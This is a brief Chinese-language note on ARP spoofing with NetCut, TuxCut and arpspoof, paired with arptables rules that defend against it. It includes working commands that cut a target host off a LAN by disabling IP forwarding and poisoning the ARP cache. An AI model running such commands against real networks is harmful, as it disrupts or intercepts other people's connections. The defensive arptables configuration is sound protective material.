Arp攻擊

netcut與netcutdefender

將兩台主機彼此的連線斷開

把gateway(192.168.1.1)的ip左移,把要斷開的兩台電腦其中一台右移(192.168.1.5),然後把要與192.168.1.5連線的192.168.1.4給cut off,那麼,他們彼此就無法連線了,但仍可以連上網路的

若是右邊的ip是gateway(192.168.1.1),那麼,該台電腦就無法連上網際網路了!

ubuntu linux:

you can also use arpspoof like this

sudo arpspoof -t "gateway ip" "your ip"

使用arptables

sudo apt-get install arptables

sudo arptables -P INPUT DROP

sudo arptables -P OUTPUT DROP

sudo arptables -A INPUT -s gateway_IP --source-mac gateway_mac -j ACCEPT

sudo arptables -A OUTPUT -d gateway_IP --destination-mac gateway_mac -j ACCEPT

tuxcut

其實此成是使用arpspoof

echo 0 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 -t 192.168.1.1 192.168.1.5

而其保護arp的方法,是使用arptables

sudo arptables -P INPUT DROP

sudo arptables -P OUTPUT DROP

sudo arptables -A INPUT -s gateway_IP --source-mac gateway_mac -j ACCEPT

sudo arptables -A OUTPUT -d gateway_IP --destination-mac gateway_mac -j ACCEPT

arptables -L

Chain INPUT (policy DROP)

-j ACCEPT -s 192.168.1.1 --src-mac 00:03:c9:a5:74:a7

Chain OUTPUT (policy DROP)

-j ACCEPT -d 192.168.1.1 --dst-mac 00:03:c9:a5:74:a7